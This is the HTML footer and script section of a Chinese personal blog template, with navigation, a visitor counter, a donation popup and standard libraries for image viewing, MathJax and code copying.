    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
        <li>
          <a href="http://www.beian.gov.cn/portal/index" target="_black" rel="nofollow">皖ICP备18009389号-1</a>
        </li>
        
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1279416140&amp;web_id=1279416140'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Syraer&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="/images/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
  var ayerConfig = {
    mathjax: true
  }
</script>

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>